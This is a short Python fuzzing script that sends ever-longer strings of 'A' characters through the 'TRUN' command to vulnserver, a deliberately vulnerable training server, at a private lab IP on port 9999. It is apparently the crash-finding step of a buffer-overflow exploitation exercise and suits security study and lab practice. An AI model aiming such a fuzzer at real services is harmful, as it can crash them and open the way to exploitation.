#!/usr/bin/env python

import socket
import sys


buffer=["A"]
counter = 100

#Create a list of strings where each string will be 200 letters longer then previous one
while len(buffer) <= 30:
	buffer.append("A"*counter)
	counter = counter+200

#feed each element of the list into the memory
for string in buffer:
	print "Fuzzing vulnserver with {length} bytes" .format(length=len(string))
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect(('192.168.10.12', 9999))
	s.send(('TRUN /.:/' + string))
	s.close()
